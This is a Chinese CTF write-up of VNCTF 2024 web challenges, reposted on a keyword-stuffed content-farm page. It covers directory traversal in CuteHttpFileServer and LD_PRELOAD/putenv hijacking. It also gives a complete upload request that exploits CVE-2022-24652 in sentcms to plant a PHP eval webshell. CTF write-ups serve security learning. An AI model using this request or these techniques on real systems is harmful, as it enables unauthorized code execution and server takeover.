当前位置: 首页 > news >正文

深圳网站建设 案例h5开发用什么工具

深圳网站建设 案例,h5开发用什么工具,网站开发哪里有,2022最好的百度seoCheckin 题目描述#xff1a;Welcome to VNCTF 2024~ long time no see. 开题#xff0c;是前端小游戏 源码里面发现一个16进制编码字符串 解码后是flag CutePath 题目描述#xff1a;源自一次现实渗透 开题 当前页面没啥好看的#xff0c;先爆破密码登录试试。爆破无果…Checkin 题目描述Welcome to VNCTF 2024~ long time no see. 开题是前端小游戏 源码里面发现一个16进制编码字符串 解码后是flag CutePath 题目描述源自一次现实渗透 开题 当前页面没啥好看的先爆破密码登录试试。爆破无果。。。 在项目的github仓库中的issues发现了别人提出的安全性问题目录穿越 安全性问题 · Issue #15 · ods-im/CuteHttpFileServer · GitHub 确实可行发现一个文件名为base64编码的文件。 解码后是账号密码即可登录。 目录穿越找到flag位置 重命名用目录穿越将文件移到可下载目录下。 点开就是flag TrySent 考点总结CVE-2022-24652文件上传漏洞 题目描述Just TrySent出错不影响解题。 后台管理是thinkphp的但是工具没检测出漏洞。 登陆后界面如下上传头像功能值得引起注意 这其实就是CVE-2022-24652危险类型文件的不加限制上传是文件上传漏洞。漏洞路由/user/upload/upload 参考文章 阿里云漏洞库 (aliyun.com) CVE-2022-24652|sentcms 4.0.x allows remote… - VULHUB开源网络安全威胁库 Sentcms任意文件上传漏洞 | Hanayuzu’Blog 抓包上传文件由于没有上传文件按钮我们手动构建上传包。 修改包 POST /user/upload/upload HTTP/1.1 Host: 7dd1d89b-bc28-43fc-9b42-a014dff41eea.vnctf2024.manqiu.top Cache-Control: max-age0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q0.9 Cookie: PHPSESSIDbdd5af1e5c92e47342e53886cecaced2 Connection: close Content-Type: multipart/form-data; boundary----WebKitFormBoundaryrhx2kYAMYDqoTThz Content-Length: 770------WebKitFormBoundaryrhx2kYAMYDqoTThz Content-Disposition: form-data; nameidWU_FILE_0 ------WebKitFormBoundaryrhx2kYAMYDqoTThz Content-Disposition: form-data; namenametest.jpg ------WebKitFormBoundaryrhx2kYAMYDqoTThz Content-Disposition: form-data; nametypeimage/jpeg ------WebKitFormBoundaryrhx2kYAMYDqoTThz Content-Disposition: form-data; namelastModifiedDateWed Jul 21 2021 18:15:25 GMT0800 (中国标准时间) ------WebKitFormBoundaryrhx2kYAMYDqoTThz Content-Disposition: form-data; namesize164264 ------WebKitFormBoundaryrhx2kYAMYDqoTThz Content-Disposition: form-data; namefile; filenameshell.php Content-Type: image/jpegJay17 ?php eval($_POST[1]);?------WebKitFormBoundaryrhx2kYAMYDqoTThz-- 访问呢恶意文件getshell codefever_again【*】 题目描述非常好代码爱来自审计codefever 最新 开题 先注册账号试试 givenphp【*】 考点总结LD_PRELOAD putenv()劫持共享so绕过LD_PRELOAD劫持ld劫持 题目描述非常好题目爱来自白给 直接给了源码 ?php highlight_file(__FILE__); if(isset($_POST[upload])){handleFileUpload($_FILES[file]); }if(isset($_GET[challenge])){waf();$value$_GET[value];$key$_GET[key];$funccreate_function(,putenv($key$value););if($func$_GET[guess]){$func();system(whoami);} } function waf() {if(preg_match(/\||%|\(|\)|;|bash/i,$_GET[key])||preg_match(/\||%|\(|\)|;|bash/i,$_GET[value])){die(evil input!!!);} } function handleFileUpload($file) {$uploadDirectory /tmp/;if ($file[error] ! UPLOAD_ERR_OK) {echo 文件上传失败。;return;}$fileExtension pathinfo($file[name], PATHINFO_EXTENSION);$newFileName uniqid(uploaded_file_, true) . . . $fileExtension;$destination $uploadDirectory . $newFileName;if (move_uploaded_file($file[tmp_name], $destination)) {echo $destination;} else {echo 文件移动失败。;} }题目有两个功能一个是文件上传还有一个是环境变量修改。过滤死了不能直接环境变量注入。 有文件上传有环境变量修改就是LD_PRELOAD劫持ld劫持。这个方法用在disable_functions的手动绕过中也就是LD_PRELOAD putenv()劫持共享so绕过。
http://www.w-s-a.com/news/712688/

相关文章:

  • 如何设计公司网站公司网站空间要多大
  • 建筑公司网站排名5G网站建设要多少个
  • seo怎样新建网站弹簧东莞网站建设
  • 在线做爰直播网站石家庄房产
  • 建筑网站哪里找拓者设计吧首页
  • 广州网站的建设wordpress注册数学验证码
  • 装修平台自己做网站有几个黄页名录网站开发
  • php网站的安全优势平面设计师培训
  • 乐清市网站建设设计重庆沙坪坝区
  • 什么是seo站内优化开发网页的工具有哪些
  • 文化类网站是不是休闲娱乐类网站青州市建设局网站
  • 网站的中英文切换代码做现货黄金网站
  • 万江区网站建设公司前端如何根据ui设计写页面
  • 宿迁公司做网站手机免费创建网站的软件
  • 免费可商用素材网站山东威海网站开发
  • 建设网站什么语言比较合适柳州建设网经济适用房
  • 企业网站的主要功能板块平台推广是做什么的
  • 网页网站自做全搞定西安建设工程信息网诚信平台
  • 网站vip怎么做建网站外包公司
  • 胶州建网站域名不备案可以正常使用吗
  • 网站建设客户开发方案软件工程师行业分析
  • 沈阳网站建设黑酷科技微信小程序怎么一键删除
  • 做网站产品搜索展示实现西安百度推广服务公司
  • 建立网站接受投注是什么意思一般使用的分辨率的显示密度是多少
  • 怎么建立一个网站开展业务网站建设人员的工资分配
  • 求职网站建设方案企业网站开发需求分析
  • 西安企业网站开发可以做哪些有趣的网站
  • 房产类网站开发云南百度建站
  • 泰州网站建设电话彩票网站怎么做代理
  • 泉州网站制作推广山西网站开发建设